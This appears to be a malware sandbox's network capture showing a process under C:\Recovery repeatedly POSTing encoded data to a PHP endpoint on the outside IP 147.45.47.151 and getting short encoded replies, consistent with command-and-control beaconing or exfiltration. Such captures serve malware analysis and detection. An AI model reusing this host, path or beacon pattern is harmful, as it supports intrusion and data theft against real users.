                                                                                          Dec 10, 2024 07:29:05.154058933 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:05.507013083 CET | 2512 | OUT | Data Raw: 52 5c 5f 53 5e 5c 55 50 58 57 5a 57 52 50 51 5c 5b 59 5d 47 57 5f 50 5a 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R\_S^\UPXWZWRPQ\[Y]GW_PZ^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!14)=!69>4%?'7!>)(P+;>4! :).\%!Z+0
                                                                                          Dec 10, 2024 07:29:06.367384911 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:06.600931883 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:06 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          37 | 192.168.2.8 | 49771 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:06.845585108 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:07.238975048 CET | 2512 | OUT | Data Raw: 52 5c 5f 5e 5e 58 55 51 58 57 5a 57 52 56 51 57 5b 51 5d 46 57 5e 50 5a 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R\_^^XUQXWZWRVQW[Q]FW^PZ^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"Z1?0\ :!=Z*>?\' Y$\8U"=)+ );%[#7\.9.\%!Z+(
                                                                                          Dec 10, 2024 07:29:08.105334997 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:08.340827942 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:08 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          38 | 192.168.2.8 | 49777 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:08.619940996 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:08.978048086 CET | 2512 | OUT | Data Raw: 57 5d 5a 5d 5b 58 55 5b 58 57 5a 57 52 54 51 55 5b 5c 5d 47 57 5f 50 58 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W]Z][XU[XWZWRTQU[\]GW_PX^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"&/#\=55[=-/[$? X3?!!\?)!^71#Z9.\%!Z+
                                                                                          Dec 10, 2024 07:29:09.847959042 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:10.080960989 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:09 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          39 | 192.168.2.8 | 49778 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:09.438215017 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 1984
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:09.821811914 CET | 1984 | OUT | Data Raw: 57 5c 5a 59 5e 5f 55 50 58 57 5a 57 52 51 51 55 5b 51 5d 42 57 5e 50 59 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W\ZY^_UPXWZWRQQU[Q]BW^PY^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"2 !*55=^). $%*76=%\+;3+89_#2?]:.\%!Z+4
                                                                                          Dec 10, 2024 07:29:10.699578047 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:10.932754993 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:10 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 25 12 34 39 37 59 25 1d 20 53 38 08 3b 1d 25 03 3f 40 3e 0c 32 16 25 28 30 04 2c 21 27 1c 2a 04 21 5c 3c 03 2b 0f 29 06 3c 0e 24 35 21 46 0c 1d 24 14 30 5d 2e 16 24 3e 3b 5c 30 11 27 1d 33 22 11 58 2b 33 38 1b 20 20 30 05 24 23 28 1f 3b 13 08 54 38 25 2d 18 29 32 31 0d 31 12 22 57 0d 12 24 08 31 20 2e 00 22 32 36 55 22 0f 2b 0d 3c 35 30 5c 27 10 3b 5d 36 3a 25 10 24 57 24 5a 20 09 0a 12 2b 3b 3e 59 31 2d 0c 1a 27 01 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98%497Y% S8;%?@>2%(0,!'*!\<+)<$5!F$0].$>;\0'3"X+38 0$#(;T8%-)211"W$1 ."26U"+<50\';]6:%$W$Z +;>Y1-' ^*+U?WT0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          40 | 192.168.2.8 | 49784 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:10.718317032 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:11.069745064 CET | 2512 | OUT | Data Raw: 57 59 5a 5a 5e 58 50 5a 58 57 5a 57 52 53 51 57 5b 58 5d 41 57 54 50 54 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WYZZ^XPZXWZWRSQW[X]AWTPT^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!%Y0^4*"U66)-+$/3 U".1(^3) ;\9.\%!Z+<
                                                                                          Dec 10, 2024 07:29:11.984668970 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:12.216844082 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:11 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          41 | 192.168.2.8 | 49785 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:12.477255106 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:13.028445005 CET | 2512 | OUT | Data Raw: 52 5b 5a 59 5b 5e 55 5b 58 57 5a 57 52 57 51 53 5b 58 5d 41 57 54 50 5c 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R[ZY[^U[XWZWRWQS[X]AWTP\^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!2/7\:P!65X>Z3?33 V =!Y);$R)7#\..\%!Z+,
                                                                                          Dec 10, 2024 07:29:13.739509106 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:13.972685099 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:13 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          42 | 192.168.2.8 | 49791 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:14.247911930 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:14.600766897 CET | 2512 | OUT | Data Raw: 52 5d 5a 58 5e 5b 55 5a 58 57 5a 57 52 50 51 5c 5b 5d 5d 41 57 53 50 58 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R]ZX^[UZXWZWRPQ\[]]AWSPX^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"1(#:"51)>/^34$* .:<;,*]6!!;X9.\%!Z+0
                                                                                          Dec 10, 2024 07:29:15.509708881 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:15.794023037 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:15 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0
                                                                                          Dec 10, 2024 07:29:15.990281105 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2004
                                                                                          Expect: 100-continue


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          43 | 192.168.2.8 | 49797 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:16.244596958 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:16.600753069 CET | 2512 | OUT | Data Raw: 57 5f 5f 53 5b 59 55 5f 58 57 5a 57 52 53 51 52 5b 5b 5d 45 57 55 50 58 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W__S[YU_XWZWRSQR[[]EWUPX^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"_'<74))!6=Y=00+3\#6=\? =;!428..\%!Z+<
                                                                                          Dec 10, 2024 07:29:17.505887032 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:17.743743896 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:17 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          44 | 192.168.2.8 | 49803 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:17.986052036 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:18.547487020 CET | 2512 | OUT | Data Raw: 57 5b 5a 58 5b 5b 55 5c 58 57 5a 57 52 51 51 52 5b 5c 5d 45 57 5f 50 5f 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W[ZX[[U\XWZWRQQR[\]EW_P_^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"]&,<^#\6U5P5)<%/4^35)8++(!X!":).\%!Z+4
                                                                                          Dec 10, 2024 07:29:19.249823093 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:19.489058971 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:19 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          45 | 192.168.2.8 | 49807 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:19.736645937 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:20.085167885 CET | 2512 | OUT | Data Raw: 52 5a 5f 5f 5b 5e 50 5c 58 57 5a 57 52 5c 51 5c 5b 5e 5d 43 57 52 50 5e 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: RZ__[^P\XWZWR\Q\[^]CWRP^^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!14 9>T6%:(.7^0,<0T"](,+;" 17[.9.\%!Z+
                                                                                          Dec 10, 2024 07:29:21.006457090 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:21.241146088 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:20 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          46 | 192.168.2.8 | 49810 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:21.730703115 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2004
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:22.117626905 CET2004OUTData Raw: 57 5c 5f 5c 5e 5e 50 59 58 57 5a 57 52 51 51 52 5b 51 5d 41 57 52 50 55 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W\_\^^PYXWZWRQQR[Q]AWRPU^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"Z&?_7\%6%Y>><0,$^30T5=!X+8+=]=^#.9.\%!Z+4
                                                                                          Dec 10, 2024 07:29:22.991971970 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:23.224808931 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:22 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 25 12 37 07 05 5a 26 0a 30 53 2f 32 38 0f 26 2d 3b 45 3d 0b 26 58 31 06 30 07 3a 32 3b 1f 2a 3e 32 04 28 29 2f 0d 29 01 30 0c 24 35 21 46 0c 1d 27 01 27 05 26 1b 27 2d 3b 59 24 59 3f 10 30 1c 37 59 2b 20 24 19 23 0d 2f 5a 30 0a 3c 56 2f 2d 07 0f 2c 43 21 1a 2a 0b 36 57 31 12 22 57 0d 12 27 54 32 09 25 1c 20 22 22 1e 36 31 2c 56 2b 1b 3b 05 27 10 3f 12 23 3a 1b 5b 24 08 38 59 20 27 0a 1c 3f 05 3e 13 24 2e 31 0b 30 3b 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98%7Z&0S/28&-;E=&X10:2;*>2()/)0$5!F''&'-;Y$Y?07Y+ $#/Z0<V/-,C!*6W1"W'T2% ""61,V+;'?#:[$8Y '?>$.10; ^*+U?WT0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          47 | 192.168.2.8 | 49811 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:29:21.856769085 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:22.210347891 CET2512OUTData Raw: 52 5c 5a 59 5e 55 55 59 58 57 5a 57 52 52 51 54 5b 5a 5d 40 57 5e 50 5d 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R\ZY^UUYXWZWRRQT[Z]@W^P]^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"&]#*)"&=^*><'<8X'*("2??>;*#T'Y9.\%!Z+
                                                                                          Dec 10, 2024 07:29:23.117686033 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:23.352566957 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:22 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
